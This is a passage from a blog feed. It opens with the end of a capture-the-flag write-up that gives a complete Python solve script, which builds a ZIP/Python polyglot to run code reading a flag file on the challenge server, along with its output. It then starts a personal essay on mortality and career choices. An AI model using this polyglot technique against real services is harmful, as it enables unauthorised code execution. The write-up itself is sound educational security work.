<span data-line=""><span style="color:#F47067">    return</span><span style="color:#6CB6FF"> all</span><span style="color:#ADBAC7">(((x </span><span style="color:#F47067">&gt;&gt;</span><span style="color:#ADBAC7"> (</span><span style="color:#6CB6FF">8</span><span style="color:#F47067"> *</span><span style="color:#ADBAC7"> i)) </span><span style="color:#F47067">&amp;</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">80</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">==</span><span style="color:#6CB6FF"> 0</span><span style="color:#F47067"> for</span><span style="color:#ADBAC7"> i </span><span style="color:#F47067">in</span><span style="color:#6CB6FF"> range</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">4</span><span style="color:#ADBAC7">))</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">def</span><span style="color:#DCBDFB"> find_suffix</span><span style="color:#ADBAC7">(core: </span><span style="color:#6CB6FF">bytes</span><span style="color:#ADBAC7">, length: </span><span style="color:#6CB6FF">int</span><span style="color:#F47067"> =</span><span style="color:#6CB6FF"> 4</span><span style="color:#ADBAC7">) -&gt; </span><span style="color:#6CB6FF">bytes</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#96D0FF">    """Brute-force an ASCII suffix of given length making CRC 32 valid."""</span></span>
<span data-line=""><span style="color:#ADBAC7">    printable </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> range</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">0x</span><span style="color:#6CB6FF">20</span><span style="color:#ADBAC7">, </span><span style="color:#F47067">0x</span><span style="color:#6CB6FF">7F</span><span style="color:#ADBAC7">)         </span><span style="color:#768390"># space … tilde</span></span>
<span data-line=""><span style="color:#F47067">    for</span><span style="color:#ADBAC7"> tail </span><span style="color:#F47067">in</span><span style="color:#ADBAC7"> itertools.product(printable, </span><span style="color:#F69D50">repeat</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">length):</span></span>
<span data-line=""><span style="color:#ADBAC7">        payload </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> core </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> bytes</span><span style="color:#ADBAC7">(tail)</span></span>
<span data-line=""><span style="color:#ADBAC7">        crc     </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> zlib.crc32(payload) </span><span style="color:#F47067">&amp;</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">FFFFFFFF</span></span>
<span data-line=""><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> ascii_safe(crc):</span></span>
<span data-line=""><span style="color:#F47067">            return</span><span style="color:#6CB6FF"> bytes</span><span style="color:#ADBAC7">(tail), crc</span></span>
<span data-line=""><span style="color:#F47067">    raise</span><span style="color:#6CB6FF"> RuntimeError</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"unexpected: no suffix found"</span><span style="color:#ADBAC7">)</span></span></code></pre></figure>
<p>The last place where this problem occurs is in the CD offset. If our payload is too long, the offset will exceed 127 bytes, which introduces a non-ASCII byte.
To get around this, we just add padding after the file contents and before the CDFH, so that the offset contains only ASCII-safe bytes, e.g. <code>\x01\x00</code>.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#768390"># patch CD offset to make it ASCII safe</span></span>
<span data-line=""><span style="color:#ADBAC7">cd_offset </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> delta </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> len</span><span style="color:#ADBAC7">(lfh) </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">PAYLOAD</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">pad </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> 0</span></span>
<span data-line=""><span style="color:#F47067">while</span><span style="color:#F47067"> not</span><span style="color:#ADBAC7"> ascii_safe(cd_offset </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> pad):</span></span>
<span data-line=""><span style="color:#ADBAC7">    pad </span><span style="color:#F47067">+=</span><span style="color:#6CB6FF"> 1</span></span>
<span data-line=""><span style="color:#ADBAC7">padding </span><span style="color:#F47067">=</span><span style="color:#F47067"> b</span><span style="color:#96D0FF">'</span><span style="color:#F47067">\x00</span><span style="color:#96D0FF">'</span><span style="color:#F47067"> *</span><span style="color:#ADBAC7"> pad</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">cd_offset </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> pad</span></span></code></pre></figure>
<h2>Putting it All Together</h2>
<p>Our final payload looks like this:</p>
<figure class="mx-auto"><img alt="Payload" loading="lazy" width="949" height="56" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffinal.6ce789be.png&amp;w=1080&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffinal.6ce789be.png&amp;w=1920&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffinal.6ce789be.png&amp;w=1920&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>which we construct and send to the service with the following code:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">import</span><span style="color:#ADBAC7"> io, struct, zipfile, pathlib</span></span>
<span data-line=""><span style="color:#F47067">import</span><span style="color:#ADBAC7"> itertools</span></span>
<span data-line=""><span style="color:#F47067">import</span><span style="color:#ADBAC7"> zlib</span></span>
<span data-line=""><span style="color:#F47067">from</span><span style="color:#ADBAC7"> pwn </span><span style="color:#F47067">import</span><span style="color:#ADBAC7"> remote</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#6CB6FF">JUNK_HEAD</span><span style="color:#F47067"> =</span><span style="color:#96D0FF"> """print("hello world!")</span></span>
<span data-line=""><span style="color:#96D0FF"># This is a comment. Here's another:</span></span>
<span data-line=""><span style="color:#96D0FF"># """</span><span style="color:#ADBAC7">.encode()</span></span>
<span data-line=""><span style="color:#6CB6FF">JUNK_TAIL</span><span style="color:#F47067"> =</span><span style="color:#96D0FF"> """</span></span>
<span data-line=""><span style="color:#96D0FF">print("Thanks for playing!")"""</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#6CB6FF">FILENAME</span><span style="color:#F47067"> =</span><span style="color:#F47067"> b</span><span style="color:#96D0FF">"__main__.py"</span></span>
<span data-line=""><span style="color:#6CB6FF">BODY</span><span style="color:#F47067">     =</span><span style="color:#F47067"> b</span><span style="color:#96D0FF">"print(open('/home/ctfuser/flag').read())#"</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">def</span><span style="color:#DCBDFB"> ascii_safe</span><span style="color:#ADBAC7">(x: </span><span style="color:#6CB6FF">int</span><span style="color:#ADBAC7">) -&gt; </span><span style="color:#6CB6FF">bool</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#96D0FF">    """True if all four bytes have high bit clear."""</span></span>
<span data-line=""><span style="color:#F47067">    return</span><span style="color:#6CB6FF"> all</span><span style="color:#ADBAC7">(((x </span><span style="color:#F47067">&gt;&gt;</span><span style="color:#ADBAC7"> (</span><span style="color:#6CB6FF">8</span><span style="color:#F47067"> *</span><span style="color:#ADBAC7"> i)) </span><span style="color:#F47067">&amp;</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">80</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">==</span><span style="color:#6CB6FF"> 0</span><span style="color:#F47067"> for</span><span style="color:#ADBAC7"> i </span><span style="color:#F47067">in</span><span style="color:#6CB6FF"> range</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">4</span><span style="color:#ADBAC7">))</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">def</span><span style="color:#DCBDFB"> find_suffix</span><span style="color:#ADBAC7">(core: </span><span style="color:#6CB6FF">bytes</span><span style="color:#ADBAC7">, length: </span><span style="color:#6CB6FF">int</span><span style="color:#F47067"> =</span><span style="color:#6CB6FF"> 4</span><span style="color:#ADBAC7">) -&gt; </span><span style="color:#6CB6FF">bytes</span><span style="color:#ADBAC7">:</span></span>
<span data-line=""><span style="color:#96D0FF">    """Brute-force an ASCII suffix of given length making CRC 32 valid."""</span></span>
<span data-line=""><span style="color:#ADBAC7">    printable </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> range</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">0x</span><span style="color:#6CB6FF">20</span><span style="color:#ADBAC7">, </span><span style="color:#F47067">0x</span><span style="color:#6CB6FF">7F</span><span style="color:#ADBAC7">)         </span><span style="color:#768390"># space … tilde</span></span>
<span data-line=""><span style="color:#F47067">    for</span><span style="color:#ADBAC7"> tail </span><span style="color:#F47067">in</span><span style="color:#ADBAC7"> itertools.product(printable, </span><span style="color:#F69D50">repeat</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">length):</span></span>
<span data-line=""><span style="color:#ADBAC7">        payload </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> core </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> bytes</span><span style="color:#ADBAC7">(tail)</span></span>
<span data-line=""><span style="color:#ADBAC7">        crc     </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> zlib.crc32(payload) </span><span style="color:#F47067">&amp;</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">FFFFFFFF</span></span>
<span data-line=""><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> ascii_safe(crc):</span></span>
<span data-line=""><span style="color:#F47067">            return</span><span style="color:#6CB6FF"> bytes</span><span style="color:#ADBAC7">(tail), crc</span></span>
<span data-line=""><span style="color:#F47067">    raise</span><span style="color:#6CB6FF"> RuntimeError</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"unexpected: no suffix found"</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#6CB6FF">SUFFIX</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">CRC</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> find_suffix(</span><span style="color:#6CB6FF">BODY</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#6CB6FF">PAYLOAD</span><span style="color:#F47067">     =</span><span style="color:#6CB6FF"> BODY</span><span style="color:#F47067"> +</span><span style="color:#6CB6FF"> SUFFIX</span></span>
<span data-line=""><span style="color:#6CB6FF">SIZE</span><span style="color:#F47067">        =</span><span style="color:#6CB6FF"> len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">PAYLOAD</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">def</span><span style="color:#DCBDFB"> le32</span><span style="color:#ADBAC7">(x): </span><span style="color:#F47067">return</span><span style="color:#ADBAC7"> struct.pack(</span><span style="color:#96D0FF">"&lt;I"</span><span style="color:#ADBAC7">, x)</span></span>
<span data-line=""><span style="color:#F47067">def</span><span style="color:#DCBDFB"> le16</span><span style="color:#ADBAC7">(x): </span><span style="color:#F47067">return</span><span style="color:#ADBAC7"> struct.pack(</span><span style="color:#96D0FF">"&lt;H"</span><span style="color:#ADBAC7">, x)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#6CB6FF">SIG_LFH</span><span style="color:#F47067">  =</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">04034B50</span></span>
<span data-line=""><span style="color:#6CB6FF">SIG_CDH</span><span style="color:#F47067">  =</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">02014B50</span></span>
<span data-line=""><span style="color:#6CB6FF">SIG_EOCD</span><span style="color:#F47067"> =</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">06054B50</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># --------------------------------------------------------------------</span></span>
<span data-line=""><span style="color:#768390"># build the ZIP file</span></span>
<span data-line=""><span style="color:#768390"># --------------------------------------------------------------------</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">delta </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">JUNK_HEAD</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># Local file header</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh  </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIG_LFH</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># version needed to extract</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># general purpose bit flag</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># compression method = stored</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># last mod file time</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># last mod file date</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">CRC</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIZE</span><span style="color:#ADBAC7">)       </span><span style="color:#768390"># compressed size</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIZE</span><span style="color:#ADBAC7">)       </span><span style="color:#768390"># uncompressed size</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">FILENAME</span><span style="color:#ADBAC7">))</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># extra field length</span></span>
<span data-line=""><span style="color:#ADBAC7">lfh </span><span style="color:#F47067">+=</span><span style="color:#6CB6FF"> FILENAME</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># Central directory header</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh  </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIG_CDH</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># version made by</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># version needed</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># flags</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># method</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># time</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># date</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">CRC</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIZE</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIZE</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">FILENAME</span><span style="color:#ADBAC7">))</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># extra len</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># comment len</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># disk #</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># int attrs</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)          </span><span style="color:#768390"># ext attrs</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(delta)      </span><span style="color:#768390"># relative offset of LFH</span></span>
<span data-line=""><span style="color:#ADBAC7">cdh </span><span style="color:#F47067">+=</span><span style="color:#6CB6FF"> FILENAME</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># patch CD offset to make it ASCII safe</span></span>
<span data-line=""><span style="color:#ADBAC7">cd_offset </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> delta </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> len</span><span style="color:#ADBAC7">(lfh) </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">PAYLOAD</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">pad </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> 0</span></span>
<span data-line=""><span style="color:#F47067">while</span><span style="color:#F47067"> not</span><span style="color:#ADBAC7"> ascii_safe(cd_offset </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> pad):</span></span>
<span data-line=""><span style="color:#ADBAC7">    pad </span><span style="color:#F47067">+=</span><span style="color:#6CB6FF"> 1</span></span>
<span data-line=""><span style="color:#ADBAC7">padding </span><span style="color:#F47067">=</span><span style="color:#F47067"> b</span><span style="color:#96D0FF">'</span><span style="color:#F47067">\x00</span><span style="color:#96D0FF">'</span><span style="color:#F47067"> *</span><span style="color:#ADBAC7"> pad</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">cd_offset </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> pad</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># end of central directory record</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd  </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">SIG_EOCD</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)         </span><span style="color:#768390"># disk #</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)         </span><span style="color:#768390"># disk where CD starts</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">)         </span><span style="color:#768390"># # entries on this disk</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">)         </span><span style="color:#768390"># total # entries</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(</span><span style="color:#6CB6FF">len</span><span style="color:#ADBAC7">(cdh))  </span><span style="color:#768390"># size of central directory</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le32(cd_offset) </span><span style="color:#768390"># offset of CD</span></span>
<span data-line=""><span style="color:#ADBAC7">eocd </span><span style="color:#F47067">+=</span><span style="color:#ADBAC7"> le16(</span><span style="color:#6CB6FF">len</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">JUNK_TAIL</span><span style="color:#ADBAC7">)) </span><span style="color:#768390"># ZIP comment length</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">zip_bytes </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> lfh </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> PAYLOAD</span><span style="color:#F47067"> +</span><span style="color:#ADBAC7"> padding </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> cdh </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> eocd</span></span>
<span data-line=""><span style="color:#ADBAC7">zip_bytes </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> bytearray</span><span style="color:#ADBAC7">(zip_bytes)</span></span>
<span data-line=""><span style="color:#F47067">assert</span><span style="color:#6CB6FF"> all</span><span style="color:#ADBAC7">(b </span><span style="color:#F47067">&lt;</span><span style="color:#F47067"> 0x</span><span style="color:#6CB6FF">80</span><span style="color:#F47067"> for</span><span style="color:#ADBAC7"> b </span><span style="color:#F47067">in</span><span style="color:#ADBAC7"> zip_bytes), </span><span style="color:#96D0FF">"non-ASCII byte detected!"</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># --------------------------------------------------------------------</span></span>
<span data-line=""><span style="color:#768390"># solve the challenge</span></span>
<span data-line=""><span style="color:#768390"># --------------------------------------------------------------------</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">with</span><span style="color:#6CB6FF"> open</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"polyglot.zip"</span><span style="color:#ADBAC7">, </span><span style="color:#96D0FF">"wb"</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">as</span><span style="color:#ADBAC7"> f:</span></span>
<span data-line=""><span style="color:#ADBAC7">    f.write(</span><span style="color:#6CB6FF">JUNK_HEAD</span><span style="color:#F47067"> +</span><span style="color:#ADBAC7"> zip_bytes </span><span style="color:#F47067">+</span><span style="color:#6CB6FF"> JUNK_TAIL</span><span style="color:#ADBAC7">.encode())</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">conn </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> remote(</span><span style="color:#96D0FF">"comments-only.chal.uiuc.tf"</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">1337</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">ssl</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">True</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">conn.sendlineafter(</span><span style="color:#96D0FF">"&gt;"</span><span style="color:#ADBAC7">, zip_bytes)</span></span>
<span data-line=""><span style="color:#6CB6FF">print</span><span style="color:#ADBAC7">(conn.recvall().decode(</span><span style="color:#96D0FF">'latin-1'</span><span style="color:#ADBAC7">))</span></span></code></pre></figure>
<p>This gives us the flag:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="bash" data-theme="github-dark-dimmed"><code data-language="bash" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F69D50">$</span><span style="color:#96D0FF"> python3</span><span style="color:#96D0FF"> solve.py</span></span>
<span data-line=""><span style="color:#ADBAC7">[+] Opening connection to comments-only.chal.uiuc.tf on port 1337: Done</span></span>
<span data-line=""><span style="color:#ADBAC7">[+] Receiving all data: Done (</span><span style="color:#F69D50">38B</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">[</span><span style="color:#F47067">*</span><span style="color:#ADBAC7">] Closed connection to comments-only.chal.uiuc.tf port 1337</span></span>
<span data-line=""><span style="color:#F69D50"> uiuctf</span><span style="color:#96D0FF">{yeehaw_954b4b3814b22c0b4eecd}</span></span></code></pre></figure>
<h2>Conclusion</h2>
<p>I think I wouldn't have solved this challenge (or at least not as quickly) without the help of Hacktron. In general, AI has helped me a lot in this CTF.
This challenge was the best example of this, but I also used AI to help me in:</p>
<ul>
<li>Writing exploits for the final web challenge, which involved an interesting side channel involving the TypeScript compiler.</li>
<li>All of the cryptography challenges. Interestingly, o3 was able to one-shot them.</li>
</ul>
<p>Hacktron's flexibility was also a game changer, allowing me to quickly adapt it to my needs and get it to do exactly what I wanted. I think this is a good example of how AI can be used to augment human capabilities, and I'm excited to see how it will continue to evolve in the future.</p>
<p>In particular, I think that human pentesters and security researchers will soon be able to customise agents in very specific ways to improve their productivity in the immediate future, and Hacktron will be part of that. With highly performant and versatile agents that can be plugged into a wide range of existing workflows and components of the software development lifecycle, I think we will see a new era of AI-assisted security engineering.</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[What would happen if I died tomorrow?]]></title>
            <link>https://www.analogue.computer/blog/died-tomorrow</link>
            <guid>https://www.analogue.computer/blog/died-tomorrow</guid>
            <pubDate>Fri, 18 Jul 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>Someone asked me this question recently. Kinda morbid, but I think I was more surprised that I didn't have a good
answer.</p>
<p>Have I done enough to justify my existence? Have I been a net positive to the world? If someone erased my existence from the timeline,
would the world look any different? Would people miss me? Would I have left a legacy?</p>
<h2>Temporal discounting</h2>
<p>I think the reason this question hit me so hard is because it made me realize how much of a role temporal discounting
has, so far, played in my life. Put simply, temporal discounting is the tendency to value immediate rewards more than future ones.
It's why we procrastinate, why we eat junk food, and why we don't save for retirement. But it's also why, for most
of my life, I didn't really think about what I was optimizing for in the long term.</p>
<p>Even as I'm now building a startup, I find myself thinking about the next few months, the next year, but it's really hard
to think about the next 10 years, or 20 years. I also kind of landed in this space by accident — at the time, I was trying
to avoid serving the military as an infantry soldier, so I decided to apply to serve as a cybersecurity specialist instead.
I borrowed a 500-page textbook from my teacher, read it cover to cover right before the test, and somehow got in. I didn't think
that a few years later, I would be competing in the DEF CON CTF finals, or that I would be making a salary within the top 1% of people my
age doing freelance pentesting, or that I would be building a startup in cybersecurity.</p>
<p>Even when I ultimately went to Cambridge, I didn't really think about what that would have meant for my life once I graduated.
I just had a vague idea that it would be prestigious and would unlock some doors for me. Ultimately, it did get me a prestigious
internship which I ended up not taking, and I could have just as easily started Hacktron 2 years ago without ever going to Cambridge.</p>
<p>Perhaps I wouldn't have met my current investors, or perhaps I would have met them in a different way. I wouldn't know.</p>
<h2>What to optimise for?</h2>
<p>Now that I have this realization, I think the question becomes: what do I want to optimize for? What should I be doing
so that 10 years from now, if I were to die, I would feel like I had lived a life worth living?</p>
<p>I think growing up, this had meant different things to me at different times. When I was younger, for the longest time,
it was about being the best at something. I refused to be average, and I guess if I had died the moment I hit my dream rank
in League of Legends, I would have felt happy with my life.</p>
<p>At some point in the past few years, it became about making money. This was kind of a means to an end, because I thought that
I wanted to buy my parents the best bungalow in Singapore and give my grandparents the best life possible. I thought if I
got the highest paying job I could, I would be happy.</p>
<p>But I think I realized that this was a bit of a dead end. Put bluntly, I see this as just rebalancing a single coordinate in the
